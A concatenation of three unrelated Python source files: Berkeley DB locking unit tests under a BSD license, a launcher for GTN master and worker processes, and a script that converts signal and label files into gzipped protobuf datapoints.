3. Neither the name of Jesus Cea Avion nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from .test_all import db, rmtree, verbose, \
get_new_environment_path, get_new_database_path
from threading import Thread, current_thread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test01_simple..." % self.__class__.__name__)
anID = self.env.lock_id()
if verbose:
print("locker ID: %s" % anID)
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print("Aquired lock: %s" % lock)
self.env.lock_put(lock)
if verbose:
print("Released lock: %s" % lock)
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test02_threaded..." % self.__class__.__name__)
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
# Floating point rounding
self.assertTrue((end_time-start_time) >= 0.0999)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
self.assertTrue(deadlock_detection.count>0)
def test05_not_None(self):
anID = self.env.lock_id()
try:
self.assertRaises(TypeError, self.env.lock_get,
anID, None, db.DB_LOCK_WRITE)
finally:
self.env.lock_id_free(anID)
def theThread(self, lockType):
name = current_thread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print("%s: locker ID: %s" % (name, anID))
for i in range(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print("%s: Aquired %s lock: %s" % (name, lt, lock))
self.env.lock_put(lock)
if verbose:
print("%s: Released %s lock: %s" % (name, lt, lock))
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
for test in (LockingTestCase,):
test = unittest.defaultTestLoader.loadTestsFromTestCase(test)
suite.addTest(test)
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
GTN.py
|
import yaml
import torch
import multiprocessing as mp
import sys
import time
from agents.GTN_master import GTN_Master
from agents.GTN_worker import GTN_Worker
"""
script to run GTN master & slave locally
"""
def run_gtn_on_single_pc(config):
def run_gtn_worker(id):
gtn = GTN_Worker(id)
gtn.run()
def run_gtn_master(config):
gtn = GTN_Master(config)
gtn.run()
p_list = []
# cleanup working directory from old files
gtn_base = GTN_Master(config)
gtn_base.clean_working_dir()
time.sleep(2)
# first start master
p = mp.Process(target=run_gtn_master, args=(config,))
p.start()
p_list.append(p)
# then start workers
num_workers = config["agents"]["gtn"]["num_workers"]
for id in range(num_workers):
p = mp.Process(target=run_gtn_worker, args=(id,))
p.start()
p_list.append(p)
# wait till everything has finished
for p in p_list:
p.join()
def run_gtn_on_multiple_pcs(config, id):
if id == -1:
gtn_master = GTN_Master(config)
gtn_master.clean_working_dir()
gtn_master.run()
elif id >= 0:
gtn_worker = GTN_Worker(id)
gtn_worker.run()
else:
raise ValueError("Invalid ID")
if __name__ == "__main__":
with open("../default_config_halfcheetah_reward_env.yaml", "r") as stream:
config = yaml.safe_load(stream)
gtn_config = config['agents']['gtn']
config['agents']['gtn']['mode'] = 'single'
mode = config['agents']['gtn']['mode']
torch.set_num_threads(gtn_config['num_threads_per_worker'])
if mode == 'single':
run_gtn_on_single_pc(config)
elif mode == 'multi':
for arg in sys.argv[1:]:
print(arg)
id = int(sys.argv[1])
run_gtn_on_multiple_pcs(config, id)
|
_signal_label.py
|
import argparse
import logging
import gzip
from os import path
import typing
import os
from tqdm import tqdm
from typing import NamedTuple
from .. import dataset_pb2
import numpy as np
import multiprocessing as mp
import threading
from glob import glob
class MinionDataCfg(NamedTuple):
input: str
out: str
class ProcessDataPointCfg(NamedTuple):
fname_no_ext: str
cfg: MinionDataCfg
completed: mp.Queue
def processDataPoint(cfgDp: ProcessDataPointCfg):
try:
cfg = cfgDp.cfg
sol = dataset_pb2.DataPoint()
with open(cfgDp.fname_no_ext + ".signal", "r") as f:
signal = np.array(f.readlines()[0].split(), dtype=np.float)
sol.MergeFrom(dataset_pb2.DataPoint(signal=signal))
with open(cfgDp.fname_no_ext + ".label", "r") as f:
labels = []
bcall: typing.List[dataset_pb2.BasePair] = []
for l, u, b in [x.split() for x in f.readlines() if len(x)]:
labels.append(
dataset_pb2.DataPoint.BPConfidenceInterval(
lower=l,
upper=u,
pair=typing.cast(dataset_pb2.BasePair, dataset_pb2.BasePair.Value(b.upper())),
)
)
bcall.append(dataset_pb2.BasePair.Value(b.upper()))
sol.MergeFrom(
dataset_pb2.DataPoint(
basecalled=bcall,
labels=labels,
cigar=[dataset_pb2.MATCH] * len(bcall),
aligned_ref=bcall,
aligned_ref_squiggle=bcall,
basecalled_squiggle=bcall,
)
)
fname_out = path.join(cfg.out, cfgDp.fname_no_ext.split(os.sep)[-1] + ".datapoint")
with gzip.open(fname_out, "w") as f:
sol_pb_str = sol.SerializeToString()
f.write(sol_pb_str)
cfgDp.completed.put(sol_pb_str)
except Exception as ex:
logging.getLogger(__name__).error(f"Cannot process {cfgDp.fname_no_ext} {type(ex).__name__}\n{ex}", exc_info=True)
cfgDp.completed.put(ex)
def main(cfg: MinionDataCfg):
os.makedirs(cfg.out, exist_ok=True)
all = glob(cfg.input + "/*.signal")
with tqdm(total=len(all), desc="preparing dataset") as pbar:
with mp.Pool() as p:
m = mp.Manager()
q = m.Queue()
def f():
for _ in range(len(all)):
q.get()
pbar.update()
threading.Thread(target=f, daemon=True).start()
p.map(
processDataPoint,
[ProcessDataPointCfg(
fname_no_ext=os.path.splitext(x)[0],
cfg=cfg,
completed=q,
) for x in all]
)
def run(args):
logging.basicConfig(level=logging.INFO)
if args.debug:
logging.basicConfig(level=logging.DEBUG)
cfg = MinionDataCfg(
input=path.abspath(args.input),
out=path.abspath(args.out),
)
main(cfg)
return 0
def add_args(parser: argparse.ArgumentParser):
parser.add_argument("--input", "-i", help="input folder with .signal and .label files", required=True)
parser.add_argument("--out", "-o", help="output folder", required=True)
parser.set_defaults(func=run)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.